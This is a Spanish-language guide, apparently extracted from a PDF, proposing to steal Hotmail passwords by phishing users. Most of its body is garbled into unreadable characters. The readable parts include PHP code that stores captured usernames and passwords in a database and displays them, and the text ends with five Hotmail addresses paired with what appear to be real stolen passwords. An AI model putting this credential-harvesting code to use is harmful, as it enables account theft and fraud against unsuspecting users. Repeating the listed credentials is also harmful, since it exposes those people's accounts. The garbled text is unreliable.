� Siempre hay alguien que por alguna razón me pregunta si puedo “hackear” —el término

más adecuado creo que es “crackear”— las contraseñas de las cuentas de Hotmail. Por supuesto les digo que no, porque esa es la verdad. No por nada se gastan sus milloncitos para su seguridad en las cuentas de Hotmail. Atacar a Hotmail, es impensable para un informático de un nivel “promedio” como yo, pero, partiendo de los 3 elementos participantes en todo esto: �

HOSTING HOTMAIL <-----------> cuenta de correo electrónico <-----------> Usuario

�

Ya hemos entendido que no podemos atacar a HOTMAIL, y que la cuenta de correo en sí no podemos atacarla, ya que es nuestro objetivo, entonces… ¿Qué nos queda? Exacto, atacar al usuario…

El presente documento es una propuesta de cómo creo que sería posible (por lo menos en un 10 %) robar las contraseñas de Hotmail; estoy seguro que hay más formas y mejores, pero como no las he visto documentadas escribo esto, aún así con la posibilidad de que alguien más haya ideado algo mejor y también lo haya documentado. Como sea, si a alguien le puede ayudar a “resolver” esta necesidad, que le aproveche…

Eduardo Robles Pacheco

��

��������

���� ������������������������� ���� ���� ������ �������������������������������������� � ��� �� ������������������������!���� "�"��� ��"���� �#����$%��&��'���������(&����)�*��� ����� +�,��� ��,���� �#��������)�*����������-��������.� /�+��� ��+��0� ��������� ���&� ��� �������*� ��������� � 1��������

1

���� ������������������������� ���� ������ ����������������� �������������������������2�)��������������������������������2�)������ ������� ����� ������� ��� ��� �������� ��� ������ �� ����� ���� ��� ������� ��������������������������������������������������������� ���������������������������������������������������������� ��������������������������������������������������������������������������!������!��������������������"�#$���������������������������������������%�&��������������"�'����������������������������������� ��� ������ �� ����� ��(��� ��� ����� ��� �������� ����� ��������� ���������� �����������������������������������!���������������������������������������������������������� ������������������������������ )��������� ��� ��� � ���� ����� �� ����� ��������������������������������*��+���������������������������������������������������,����������$��������� #-� �����������������������������������������������.����������������������������.������������%��� /�0�-����������������������������!����������������������������������������������������������������������� 1�0�-���������������������������������������������������������������2����3����� &��!����������������������������������������������������������������"���* ,�������������������������������,����������* 4�������������� ��� ���������� ������������ ���������������������!����������������������������������������������������������������������������������������������������������!���������5���$674����������������������������������

�* 8����������������6�������������������������������������������� ������������������������������ ��������������!������������������������������������������9���������������������

* +������� ��� ���������� ��� !���� �� !����� ���� �9�� ���� �������� ��� ����� �����������������������������������������������������������������������������������!������������������������������������

�����������������������

2

���� ���������������������������������������� 6��� ��!���� ��������������������������������������������!���������������������������!���������� ���������5��������������)��������������������� ���������������*��7��������!���������������������������������������������������������������"�

������!����:����������������;���������:���������������������������:�������������������0�������:��������������������!����:�������������������:��������

�� <�����������������������������������9������������!����������"������������:������������������(�����=����:����������������������/>?@@A:������������

������ ��� ��� ����� �� ���� ��������� 5 !����� ����� ����� ���� ������ ����� �9��������� ���

��������� ��� ��� ����5�� �� ������� ���� ������ �� ��� 2�������� �������3� ����� ����������������������������������������������������������������������!�������������2����;��3���������������������!������������5��������������

�B���������������������������������������������������)��� ��������������������

���������������������������� ����*������������������������������������5��������!���������������������� ����� ��������2� ���&���� �������������6�������������������������������������������������������������������������������9�����;�����������,���������������������������������������������������������������������������������������������������������������������������������"�

;;;����������0����������� �����������������������������������9������������������������"�

���!�����:���������0���������������������:���������0������������!����:���������0�������������������C:���������0���������

�&����������������������������������������0��������������9����������������������

���5�������� �� ����9�����;����������� 4���������� ��� ��� ��������� �� ����������� ������� �������!������������������������������!������;��������!��������������������������������������������������� ���9����������8�$����������������5��������;��� ) ������������� ������������ ����� ����*�������������������9�����!��������7D�������9�����������������!�������7����������������������������� �������������9����������������) ���������������*���������������������� ����'�����������������������5������!������������'���� �������� ��34��������� +�������!������������9��������������������������������'�������������������������� ������������� )����������:�����������*� ����� ���� 2������3� )���!����:���������0��������*������������!����5��"���* +������������������������:�����������"�$������������������������������������ ���������������� ��������� �� �������� ��� �0����� ��� �9�� ���������� �������� �������� ���� ��������������9���������������������������������������������������2������������3��������9����������������������������0������������������������!�������������������

��* +�����������������!����:���������0��������"�$����������������5�������������������������������������������������������������������������������������������������������5�����������!������� ���!���������������� ��!���� ������������������������5���'�������������!��������������!�����#-� ����!����%�E�����������������������

�+��������������9�����������������������������������$��D���������������������������

����������������������������������������9��������������������������������������������������"���

2$��D���������������������3��

3

��� �� ������������������������!�����

�����������������������������������������"�F��5���������������+���������������������� ��������������2�����������!���������5�������������� ��������������;��3�G��������������������������������0�,�!������������������������������������������������������ ������ �������5������������������������������ ����H�F��������������������������������� ��

�$����������)����������������������� ����������������������*�������������

���������������5������9����������4$����������������!�����������������������������������������������"����������������������!��������������������������������� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������"�

��

6��� ��������� ���� ���� ������� �� ������ ��� �9�� �������� ��� ������ )�� �� ������� � ����������� ��������� ������������ ���� �������������� ��������� *����������������������� �������� !�������� 7����� ����� ������ ��� ���� ���� ���������� ���� ������� I6�J� ��������������������������������������9�������������������������������������������������������������������� ��28��������3����������)������������!�����������������"����������� ������������*���

4

�����������������)�#������*��������K���;��C����4���������.�����������9�������������������.�"�8������������������������������������������28��������3��������������������� ������!�������������(�������������������9�����;��������������������������9�����;���������������������������������������,����������!�������������������������������������!���������������������� ������ ������������������������������������� ����;�����������������������������������������������5����������������������������������������� �������������������)������ ��������� ���������"��������������!����������������!��������������������� � ��������������������������� ���������$��*��

�����������������������������9������(����������������������������,��������������������

��� �������� �"������������28��������3�������� ��28��������3����9�������������������������!��������������������9���������9�����;�������������������������������������������!�����������������������������������������������������

5

"��� ��"���� �#����$%��&��'���������(&����)�*��� ������

+��������!�������������������������� �����������#7��� ��9�����!������%������������������������������������&��������������"�7�����9�����;�����������

�&���9�����;������������������9����������������9���(������������������������������

����9�������������������� ����L�����&�!������������������������"��

��

+������������9� �����������������!��������� ���������������������������������� ��������� ������������9������������ �������������� �������������� ����������������9��������������������������4��������"��

�

6

������������������5����������������������������������9�����;�������������5�����"��/* $������������������������������ME&�����������5�������������;������������������"�;;;����������0��������������������������������������9����������������������������������"� ;;;����������0��������N�;�����N���!����N��������N���(����� �� ����� ��������������������������������� �������������9����� ��������������� ��������� ����������������������

�1* +��������� ���!����� �� ���5�������� ��������� ����� ���� ���� �������� �� ���� !���������������������������������) ���� ����������� ��*�������������������������������������������������������9����������������������������������������)���� ������������*��9����������������������������������������������������;������������������ ����� ��������� ������ ����� ����� ;;;��������������������������� ����� ME&� ����������������'����!�������������������������������������������

�6�������� �������������������������!�����������9�����;�����������������������������������

�����������������������"�������������� ������!����������� ��2,����������� �3���

��� ���������������������������������������������� ���9�����������������������������������������5��6�6������������������4�$-&���"��%5%�6�063�7��%����8�����

6�6����������������5�������������������� ��2,�������$��� �3����������������������������������������5�������(���2L���;��&�!��,83���2+���������3������!������������������������������!�������� ��� 4�$-&�������������������� �����������5��� ��� ������!���� )��� �������������� %�%*� ��� ���� ������ ������� ��� �9����� ;��� ������� )���������*�� 6��� ����������� ����������������� �������������������������� �������� ������������������������� �����������������6�6���4�$-&��7�������A������������������������������������������������9�����;�������������������������������������������)&��$����$��&� � ����$����'����(�*������������������� ���� 8����;��!��� )�� �������� ��� �� ������ � ���� ���������� �� %�%*� ���������������������������������!�������������;������������������ �������������������������5�������(��������������������!��������� ������������������������������� ��������������5����

&��������������������� ����� ���6�6������ �������������������� �9�� �� �������������������������������"�

�<? $Servidor = "your_servername";$Usuario = "your_user"; $Password = "your_password";$BD = "your_database"; #Instrucción para conectarnos con la Base de Datos. $Conexion = mysql_connect($Servidor,$Usuario,$Password) or die ("No se ha podido conectar con la Base de Datos"); #Instrucción para seleccionar la Base de Datos: mysql_select_db($BD,$Conexion) or die ("No se ha podido seleccionar la Base de Datos"); #Ejemplo de cómo meter los datos en la tabla: $Query = "insert into TABLA_DE_REGISTROS (USUARIOS, PASSWORDS) values (‘$text_box_usuario’, ‘$text_box_password’)"; #Ejecutamos la inserción con tal conexión en tal Base de Datos: $Execute_Query = mysql_query($Query,$Conexion) or die(mysql_error($Conexion)); ?>�

7

6���� ���������������������������� �������������������������������9������������������ 9:;7:<��<=�>�39=?3� ����������� ��� ������� ���� ���� @3@:=�?3� ��%:33A?=�3�������������������������9��������������5�������(��������9�����������������������!������������������������"�B��C�<*�C<� ��������B��C�<*�C<�� )�����������������!��������������������������������������������������������������������������������������� ��2,����������� �3����

M������������2�����������������3������������������������������"��

����������������������9�����������������������������������"��/�0�M���!����������������������������)����������������� �����"�*������ �����������9��������������� ��2,�������$��� �3��&�������C���(���������������������������������������������������������� ��� �� ���� �� ���� �������� �� ���������� ��� ������� ����!������ )(��� ���� �������������*����1�0� 7�������� ����� ��� ������ ��2,������� $��� �3� ��� ����������������������������������� ������������!�����������6�6�)��������������"������������������������������������� ����*"���*�0���������������������������������������������������������������;���������������������*�0�7����������������������������������������������*�0�7�����������������������������������������������������)��� ����������������������������*�����������������������������������������D�������������������������������!*�0�M���!�������������������������������������������������������� ���������������������� �� ���� ;��� ���������� )�� ����� ��� ��� �������� ��"��� ���� �� �� ������� ��� ����������������������������������������������������������������������� �������������������������������������������������������������������)�!*�$����������������������������������������

8

,��� ��,���� �#��������)�*����������-��������.��

8���� �� �� ���� ��� ��� ������ ����� ��� ��� ��� �� 2,������� $��� �3� ��� ���� ����� ������������������ ��������������������������������������������� ���� ��� ����������������������������9����������������������9���������������� ��������������������������8���������������������������������������9����������������������������������������������������!����������������������������������������������������������9�������

��

7���� ����� ������� ���� 4$�� 6�������� ��� ���9� ���������� �� �!������ ��� ������������������������������,���������(�������@��8�����!��������������������;���)����K���;��C�������5�����*�����������������������9��������������������������!��������������"��

��/�0��������� ����������������������������9������������� ���&�����,���������(�������@"�

����"NN���������N/��/?,�@����N/?/��<������������ ��)����������������������������� ������� ������������������� ������������������ *"���)*�������������������+����,7�����'�����*��������������C�������/-� �������(�*��1�0����������������� �������������;�����������)��������������9�����;�������������D�����������*����� �������9�������9�����;����� �������������� ����������������9��������������������!��������������������������������������������������

9

+��� ��+��0� �����������(&����)�*������&� ��� ��

7���������)������������*������� �"� ����������������9��������9�����;���)�������������6�6*� ���� ��� D����� ���� ���9� ���9� �������� ��� ������ ���� ���� ���������� �� ���� ��������� �� ��������������������D����������������������������������������������������������������������������������������������������������������������������� ��������������������������"��������7�������������������������������� ����6�6��9�������������������������������������"��<? $Servidor = "your_servername"; $Usuario = "your_user"; $Password = "your_password"; $BD = "your_database"; #Instrucción para conectarnos con la Base de Datos. $Conexion = mysql_connect($Servidor,$Usuario,$Password) or die ("No se ha podido conectar con la Base de Datos"); #Instrucción para seleccionar la Base de Datos: mysql_select_db($BD,$Conexion) or die ("No se ha podido seleccionar la Base de Datos"); #Ejemplo de cómo obtener los registros de la tabla: $Query = "SELECT USUARIOS, PASSWORDS from TABLA_DE_REGISTROS"; #Ejecutamos la consulta con tal conexión en tal Base de Datos: $Execute_Query = mysql_query($Query,$Conexion) or die(mysql_error($Conexion)); ?>�

�<������9����������������������������������!��������������������2������������� �3���

���� ������������ ��������������������� ��������������������������������������������������9��������������������������)������������� ��!����*���������������� �������������������������������5������������������ �������������)����� �������������������� (������������*"�

�<table border ='1'; align="center"> <tr> <th>REGISTROS TOTALES </th> </tr> <? # Este ciclo imprime los registros en una sola celda. No muestra una tabla típica de las que usa MySQL, muestra una lista en donde están todos los campos contenidos en una sola celda. Falta hacer la paginación de los resultados y el intercalado de los colores para diferencias los registros. while($Registros = mysql_fetch_array($Execute_Query)) { if ($colorfila==0) {$color="#DEDEBE";$colorfila=1;} else {$color="#F0F0F0";$colorfila=0;} #Aquí imprimimos dando color y formato a los campos deseados: echo "<tr><td bgcolor='".$color."'><font face='Courier New' size='2'>"; echo "USUARIO: ".$Registros['USUARIOS']. '<br/>'; echo "CONTRASEÑA: ".$Registros['PASSWORDS']. '<br/>'; echo '</font></td></tr>'; } echo '<table/>'; ?>

�<����������������������������A?�����������������������A�������H�

Nombre de usuario Contraseña preciosura.andando@hotmail.com preciosa25091986 aldo.perezoso@hotmail.com superaldo83 finanzas_cyp@hotmail.com fincyp03 othelo_matinez@hotmail.com Mtzothelo el_super_portero@hotmail.com cortalemichavo